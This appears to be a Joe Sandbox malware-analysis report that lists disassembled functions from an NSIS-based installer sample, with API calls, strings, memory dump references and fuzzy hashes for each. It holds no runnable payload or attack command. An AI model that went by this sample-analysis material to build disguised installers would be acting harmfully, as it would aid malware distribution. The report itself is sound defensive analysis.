                                                          Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                          • MulDiv.KERNEL32(?,00000064,?), ref: 00402BC5
                                                          • wsprintfA.USER32 ref: 00402BD5
                                                          • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402BCF
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                          • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                          • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                          • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                          Function 0040540E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(?,?,00435400), ref: 00405451
                                                          • GetLastError.KERNEL32 ref: 00405465
                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                          • GetLastError.KERNEL32 ref: 00405484
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: ds@$ts@
                                                          • API String ID: 3449924974-968229870
                                                          • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                          • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                          • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                          • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA
                                                          Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                          • wsprintfA.USER32 ref: 004060AA
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004060BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%s.dll$UXTHEME$\
                                                          • API String ID: 2200240437-4240819195
                                                          • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                          • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                          • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                          • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69
                                                          Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                          • GlobalFree.KERNEL32(?), ref: 0040276F
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: a3fe83495a6326a4d9725a4286933f11eb104b5d80c32fef7c5e56c283c101f8
                                                          • Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
                                                          • Opcode Fuzzy Hash: a3fe83495a6326a4d9725a4286933f11eb104b5d80c32fef7c5e56c283c101f8
                                                          • Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
                                                          Function 00405F9A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,00434000,75923410,00435400,00000000,004030EA,00435400,00435400,004032FF), ref: 00405FF2
                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                          • CharNextA.USER32(?,00434000,75923410,00435400,00000000,004030EA,00435400,00435400,004032FF), ref: 00406004
                                                          • CharPrevA.USER32(?,?,75923410,00435400,00000000,004030EA,00435400,00435400,004032FF), ref: 00406014
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                          • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                          • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                          • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                          Function 00401751 Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,00409410,00434800,00000000,00000000,00000031), ref: 00401790
                                                          • CompareFileTime.KERNEL32(-00000014,?,00409410,00409410,00000000,00000000,00409410,00434800,00000000,00000000,00000031), ref: 004017BA
                                                            • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,0042DC00,NSIS Error), ref: 00405D3C
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,?,759223A0), ref: 00404FA4
                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID:
                                                          • API String ID: 1941528284-0
                                                          • Opcode ID: dee7e85576095944788dec9a24ceabe04ca46bfab0ffc562e6d02ede3ec25bcf
                                                          • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                          • Opcode Fuzzy Hash: dee7e85576095944788dec9a24ceabe04ca46bfab0ffc562e6d02ede3ec25bcf
                                                          • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D
                                                          Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                          • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                          • Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                          • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                          Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?), ref: 00401CE2
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                          • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 9768b6d74fcf23e80bc6e427cc8127c9000c17fceaf4ea3bd4d9c813d1582257
                                                          • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                          • Opcode Fuzzy Hash: 9768b6d74fcf23e80bc6e427cc8127c9000c17fceaf4ea3bd4d9c813d1582257
                                                          • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                          Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D3B
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                          • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: 85ae1f3b485fc580be1612018afac6a4bfccfcdebcc445807fec339b6c5930a3
                                                          • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                          • Opcode Fuzzy Hash: 85ae1f3b485fc580be1612018afac6a4bfccfcdebcc445807fec339b6c5930a3
                                                          • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                          Function 00404709 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                          • wsprintfA.USER32 ref: 004047AF
                                                          • SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: 16f3989c610b79fd80df00fdf91904367b17a8de3b9fad0169c92171420f25a1
                                                          • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                          • Opcode Fuzzy Hash: 16f3989c610b79fd80df00fdf91904367b17a8de3b9fad0169c92171420f25a1
                                                          • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                          Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,?,759223A0), ref: 00404FA4
                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2987980305-0
                                                          • Opcode ID: 500f6e3a65a5d06cc6fd84bae173ca6585055f773e93e28952c5af94c5a9b7f5
                                                          • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                          • Opcode Fuzzy Hash: 500f6e3a65a5d06cc6fd84bae173ca6585055f773e93e28952c5af94c5a9b7f5
                                                          • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                          Function 00402364 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                          • lstrlenA.KERNEL32(00409C10,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                          • RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID:
                                                          • API String ID: 1356686001-0
                                                          • Opcode ID: 6bfc22de132d475452a3eabde2148332892c12b2c98957e8bf485f67369ac355
                                                          • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                          • Opcode Fuzzy Hash: 6bfc22de132d475452a3eabde2148332892c12b2c98957e8bf485f67369ac355
                                                          • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28
                                                          Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000,00402DE2,00000001), ref: 00402C15
                                                          • GetTickCount.KERNEL32 ref: 00402C33
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                          • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                          • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                          • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                          Function 00404EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00404EEB
                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                            • Part of subcall function 00403F60: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                          • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                          • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                          • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                          Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004059E5
                                                          • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004059FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                          • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                          • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                          • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98
                                                          Function 004054C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                          • CloseHandle.KERNEL32(?), ref: 004054F6
                                                          Strings
                                                          • Error launching installer, xrefs: 004054D3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
